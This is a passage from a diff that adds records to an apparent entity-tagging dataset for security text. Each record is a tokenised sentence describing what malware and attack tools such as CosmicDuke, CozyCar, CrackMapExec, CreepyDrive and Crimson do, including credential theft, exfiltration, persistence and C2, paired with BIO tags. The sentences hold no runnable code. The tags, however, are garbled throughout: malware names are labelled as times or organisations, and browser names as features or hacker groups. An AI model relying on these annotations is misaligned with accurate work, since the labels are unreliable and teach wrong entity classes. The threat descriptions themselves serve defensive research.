"B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CookieMiner", + "can", + "steal", + "Google", + "Chrome", + "and", + "Apple", + "Safari", + "browser", + "cookies", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CookieMiner", + "has", + "used", + "a", + "Unix", + "shell", + "script", + "to", + "run", + "a", + "series", + "of", + "commands", + "targeting", + "macOS." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CosmicDuke", + "exfiltrates", + "collected", + "files", + "automatically", + "over", + "FTP", + "to", + "remote", + "servers." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CosmicDuke", + "copies", + "and", + "exfiltrates", + "the", + "clipboard", + "contents", + "every", + "30", + "seconds." + ], + "ner_tags": [ + "B-Way", + "I-Features", + "I-Features", + "B-HackOrg", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CosmicDuke", + "collects", + "user", + "credentials,", + "including", + "passwords,", + "for", + "various", + "programs", + "including", + "popular", + "instant", + "messaging", + "applications", + "and", + "email", + "clients", + "as", + "well", + "as", + "WLAN", + "keys." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-HackOrg", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "CosmicDuke", + "collects", + "user", + "credentials,", + "including", + "passwords,", + "for", + "various", + "programs", + "including", + "Web", + "browsers." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-Way" + ] + }, + { + "tokens": [ + "CosmicDuke", + "steals", + "user", + "files", + "from", + "local", + "hard", + "drives", + "with", + "file", + "extensions", + "that", + "match", + "a", + "predefined", + "list." + ], + "ner_tags": [ + "B-Way", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CosmicDuke", + "steals", + "user", + "files", + "from", + "network", + "shared", + "drives", + "with", + "file", + "extensions", + "and", + "keywords", + "that", + "match", + "a", + "predefined", + "list." + ], + "ner_tags": [ + "B-Way", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CosmicDuke", + "steals", + "user", + "files", + "from", + "removable", + "media", + "with", + "file", + "extensions", + "and", + "keywords", + "that", + "match", + "a", + "predefined", + "list." + ], + "ner_tags": [ + "B-Way", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CosmicDuke", + "exfiltrates", + "collected", + "files", + "over", + "FTP", + "or", + "WebDAV.", + "Exfiltration", + "servers", + "can", + "be", + "separately", + "configured", + "from", + "C2", + "servers." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CosmicDuke", + "attempts", + "to", + "exploit", + "privilege", + "escalation", + "vulnerabilities", + "CVE-2010-0232", + "or", + "CVE-2010-4398." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "CosmicDuke", + "searches", + "attached", + "and", + "mounted", + "drives", + "for", + "file", + "extensions", + "and", + "keywords", + "that", + "match", + "a", + "predefined", + "list." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CosmicDuke", + "uses", + "a", + "keylogger." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "CosmicDuke", + "collects", + "LSA", + "secrets." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CosmicDuke", + "searches", + "for", + "Microsoft", + "Outlook", + "data", + "files", + "with", + "extensions", + ".pst", + "and", + ".ost", + "for", + "collection", + "and", + "exfiltration." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile", + "O", + "I-Features", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "CosmicDuke", + "uses", + "scheduled", + "tasks", + "typically", + "named", + "\"Watchmon", + "Service\"", + "for", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Tool", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "CosmicDuke", + "takes", + "periodic", + "screenshots", + "and", + "exfiltrates", + "them." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "CosmicDuke", + "collects", + "Windows", + "account", + "hashes." + ], + "ner_tags": [ + "B-Way", + "I-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "CosmicDuke", + "contains", + "a", + "custom", + "version", + "of", + "the", + "RC4", + "algorithm", + "that", + "includes", + "a", + "programming", + "error." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CosmicDuke", + "can", + "use", + "HTTP", + "or", + "HTTPS", + "for", + "command", + "and", + "control", + "to", + "hard-coded", + "C2", + "servers." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CosmicDuke", + "uses", + "Windows", + "services", + "typically", + "named", + "\"javamtsup\"", + "for", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "CostaBricks", + "has", + "added", + "the", + "entire", + "unobfuscated", + "code", + "of", + "the", + "legitimate", + "open", + "source", + "application", + "Blink", + "to", + "its", + "code." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CostaBricks", + "has", + "the", + "ability", + "to", + "use", + "bytecode", + "to", + "decrypt", + "embedded", + "payloads." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Features", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "CostaBricks", + "has", + "been", + "used", + "to", + "load", + "SombRAT", + "onto", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CostaBricks", + "has", + "used", + "a", + "number", + "of", + "API", + "calls,", + "including", + "`VirtualAlloc`,", + "`VirtualFree`,", + "`LoadLibraryA`,", + "`GetProcAddress`,", + "and", + "`ExitProcess`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "CostaBricks", + "can", + "inject", + "a", + "payload", + "into", + "the", + "memory", + "of", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CostaBricks", + "can", + "implement", + "a", + "custom-built", + "virtual", + "machine", + "mechanism", + "to", + "obfuscate", + "its", + "code." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CozyCar", + "uses", + "Twitter", + "as", + "a", + "backup", + "C2", + "channel", + "to", + "Twitter", + "accounts", + "specified", + "in", + "its", + "configuration", + "file." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "payload", + "of", + "CozyCar", + "is", + "encrypted", + "with", + "simple", + "XOR", + "with", + "a", + "rotating", + "key.", + "The", + "CozyCar", + "configuration", + "file", + "has", + "been", + "encrypted", + "with", + "RC4", + "keys." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CozyCar", + "has", + "executed", + "Mimikatz", + "to", + "harvest", + "stored", + "credentials", + "from", + "the", + "victim", + "and", + "further", + "victim", + "penetration." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "One", + "persistence", + "mechanism", + "used", + "by", + "CozyCar", + "is", + "to", + "set", + "itself", + "to", + "be", + "executed", + "at", + "system", + "startup", + "by", + "adding", + "a", + "Registry", + "value", + "under", + "one", + "of", + "the", + "following", + "Registry", + "keys:", + "<br><code>HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\</code>", + "<br><code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\</code>", + "<br><code>HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run</code>", + "<br><code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run</code>" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "CozyCar", + "dropper", + "has", + "masqueraded", + "a", + "copy", + "of", + "the", + "infected", + "system's", + "rundll32.exe", + "executable", + "that", + "was", + "moved", + "to", + "the", + "malware's", + "install", + "directory", + "and", + "renamed", + "according", + "to", + "a", + "predefined", + "configuration", + "file." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "CozyCar", + "dropper", + "copies", + "the", + "system", + "file", + "rundll32.exe", + "to", + "the", + "install", + "location", + "for", + "the", + "malware,", + "then", + "uses", + "the", + "copy", + "of", + "rundll32.exe", + "to", + "load", + "and", + "execute", + "the", + "main", + "CozyCar", + "component." + ], + "ner_tags": [ + "O", + "B-Way", + "B-SecTeam", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "One", + "persistence", + "mechanism", + "used", + "by", + "CozyCar", + "is", + "to", + "register", + "itself", + "as", + "a", + "scheduled", + "task." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Password", + "stealer", + "and", + "NTLM", + "stealer", + "modules", + "in", + "CozyCar", + "harvest", + "stored", + "credentials", + "from", + "the", + "victim,", + "including", + "credentials", + "used", + "as", + "part", + "of", + "Windows", + "NTLM", + "user", + "authentication." + ], + "ner_tags": [ + "B-Way", + "B-SecTeam", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "main", + "CozyCar", + "dropper", + "checks", + "whether", + "the", + "victim", + "has", + "an", + "anti-virus", + "product", + "installed.", + "If", + "the", + "installed", + "product", + "is", + "on", + "a", + "predetermined", + "list,", + "the", + "dropper", + "will", + "exit." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "system", + "info", + "module", + "in", + "CozyCar", + "gathers", + "information", + "on", + "the", + "victim", + "host’s", + "configuration." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Some", + "versions", + "of", + "CozyCar", + "will", + "check", + "to", + "ensure", + "it", + "is", + "not", + "being", + "executed", + "inside", + "a", + "virtual", + "machine", + "or", + "a", + "known", + "malware", + "analysis", + "sandbox", + "environment.", + "If", + "it", + "detects", + "that", + "it", + "is,", + "it", + "will", + "exit." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CozyCar's", + "main", + "method", + "of", + "communicating", + "with", + "its", + "C2", + "servers", + "is", + "using", + "HTTP", + "or", + "HTTPS." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "A", + "module", + "in", + "CozyCar", + "allows", + "arbitrary", + "commands", + "to", + "be", + "executed", + "by", + "invoking", + "<code>C:\\Windows\\System32\\cmd.exe</code>." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-SamFile" + ] + }, + { + "tokens": [ + "One", + "persistence", + "mechanism", + "used", + "by", + "CozyCar", + "is", + "to", + "register", + "itself", + "as", + "a", + "Windows", + "service." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CrackMapExec", + "can", + "set", + "a", + "scheduled", + "task", + "on", + "the", + "target", + "system", + "to", + "execute", + "commands", + "remotely", + "using", + "at." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CrackMapExec", + "can", + "brute", + "force", + "supplied", + "user", + "credentials", + "across", + "a", + "network", + "range." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CrackMapExec", + "can", + "enumerate", + "the", + "domain", + "user", + "accounts", + "on", + "a", + "targeted", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CrackMapExec", + "can", + "gather", + "the", + "user", + "accounts", + "within", + "domain", + "groups." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CrackMapExec", + "can", + "discover", + "specified", + "filetypes", + "and", + "log", + "files", + "on", + "a", + "targeted", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CrackMapExec", + "can", + "dump", + "hashed", + "passwords", + "from", + "LSA", + "secrets", + "for", + "the", + "targeted", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CrackMapExec", + "can", + "create", + "a", + "registry", + "key", + "using", + "wdigest." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "CrackMapExec", + "can", + "dump", + "hashed", + "passwords", + "associated", + "with", + "Active", + "Directory", + "using", + "Windows'", + "Directory", + "Replication", + "Services", + "API", + "(DRSUAPI),", + "or", + "Volume", + "Shadow", + "Copy." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "CrackMapExec", + "can", + "enumerate", + "the", + "shared", + "folders", + "and", + "associated", + "permissions", + "for", + "a", + "targeted", + "network." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CrackMapExec", + "can", + "pass", + "the", + "hash", + "to", + "authenticate", + "via", + "SMB." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "CrackMapExec", + "can", + "brute", + "force", + "passwords", + "for", + "a", + "specified", + "user", + "on", + "a", + "single", + "target", + "system", + "or", + "across", + "an", + "entire", + "network." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CrackMapExec", + "can", + "discover", + "the", + "password", + "policies", + "applied", + "to", + "the", + "target", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CrackMapExec", + "can", + "brute", + "force", + "credential", + "authentication", + "by", + "using", + "a", + "supplied", + "list", + "of", + "usernames", + "and", + "a", + "single", + "password." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CrackMapExec", + "can", + "execute", + "PowerShell", + "commands", + "via", + "WMI." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "CrackMapExec", + "can", + "discover", + "active", + "IP", + "addresses,", + "along", + "with", + "the", + "machine", + "name,", + "within", + "a", + "targeted", + "network." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CrackMapExec", + "can", + "dump", + "usernames", + "and", + "hashed", + "passwords", + "from", + "the", + "SAM." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CrackMapExec", + "can", + "enumerate", + "the", + "system", + "drives", + "and", + "associated", + "system", + "name." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CrackMapExec", + "can", + "collect", + "DNS", + "information", + "from", + "the", + "targeted", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CrackMapExec", + "can", + "discover", + "active", + "sessions", + "for", + "a", + "targeted", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CrackMapExec", + "can", + "execute", + "remote", + "commands", + "using", + "Windows", + "Management", + "Instrumentation." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CreepyDrive", + "can", + "use", + "legitimate", + "OAuth", + "refresh", + "tokens", + "to", + "authenticate", + "with", + "OneDrive." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "CreepyDrive", + "can", + "use", + "OneDrive", + "for", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "CreepyDrive", + "can", + "upload", + "files", + "to", + "C2", + "from", + "victim", + "machines." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CreepyDrive", + "can", + "use", + "cloud", + "services", + "including", + "OneDrive", + "for", + "data", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "B-Way", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "CreepyDrive", + "can", + "specify", + "the", + "local", + "file", + "path", + "to", + "upload", + "files", + "from." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "CreepyDrive", + "can", + "download", + "files", + "to", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CreepyDrive", + "can", + "use", + "Powershell", + "for", + "execution,", + "including", + "the", + "cmdlets", + "`Invoke-WebRequest`", + "and", + "`Invoke-Expression`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "CreepyDrive", + "can", + "use", + "HTTPS", + "for", + "C2", + "using", + "the", + "Microsoft", + "Graph", + "API." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "CreepySnail", + "can", + "use", + "stolen", + "credentials", + "to", + "authenticate", + "on", + "target", + "networks." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CreepySnail", + "can", + "connect", + "to", + "C2", + "for", + "data", + "exfiltration." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "CreepySnail", + "can", + "use", + "PowerShell", + "for", + "execution,", + "including", + "the", + "cmdlets", + "`Invoke-WebRequst`", + "and", + "`Invoke-Expression`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "CreepySnail", + "can", + "use", + "Base64", + "to", + "encode", + "its", + "C2", + "traffic." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CreepySnail", + "can", + "use", + "`getmac`", + "and", + "`Get-NetIPAddress`", + "to", + "enumerate", + "network", + "settings." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CreepySnail", + "can", + "execute", + "`getUsername`", + "on", + "compromised", + "systems." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CreepySnail", + "can", + "use", + "HTTP", + "for", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Crimson", + "can", + "perform", + "audio", + "surveillance", + "using", + "microphones." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Crimson", + "contains", + "a", + "module", + "to", + "steal", + "credentials", + "from", + "Web", + "browsers", + "on", + "the", + "victim", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Crimson", + "can", + "collect", + "information", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Crimson", + "contains", + "a", + "module", + "to", + "collect", + "data", + "from", + "removable", + "drives." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Crimson", + "can", + "decode", + "its", + "encoded", + "PE", + "file", + "prior", + "to", + "execution." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "B-Purp", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Crimson", + "can", + "exfiltrate", + "stolen", + "information", + "over", + "its", + "C2." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Crimson", + "has", + "the", + "ability", + "to", + "delete", + "files", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Crimson", + "contains", + "commands", + "to", + "list", + "files", + "and", + "directories,", + "as", + "well", + "as", + "search", + "for", + "files", + "matching", + "certain", + "extensions", + "from", + "a", + "defined", + "list." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Crimson", + "contains", + "a", + "command", + "to", + "retrieve", + "files", + "from", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Crimson", + "can", + "use", + "a", + "module", + "to", + "perform", + "keylogging", + "on", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Crimson", + "contains", + "a", + "command", + "to", + "collect", + "and", + "exfiltrate", + "emails", + "from", + "Outlook." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Crimson", + "can", + "set", + "a", + "Registry", + "key", + "to", + "determine", + "how", + "long", + "it", + "has", + "been", + "installed", + "and", + "possibly", + "to", + "indicate", + "the", + "version", + "number." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Crimson", + "uses", + "a", + "custom", + "TCP", + "protocol", + "for", + "C2." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "Crimson", + "has", + "the", + "ability", + "to", + "discover", + "pluggable/removable", + "drives", + "to", + "extract", + "files", + "from." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Crimson", + "contains", + "a", + "command", + "to", + "list", + "processes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Crimson", + "can", + "check", + "the", + "Registry", + "for", + "the", + "presence", + "of", + "<code>HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\last_edate</code>", + "to", + "determine", + "how", + "long", + "it", + "has", + "been", + "installed", + "on", + "a", + "host." + 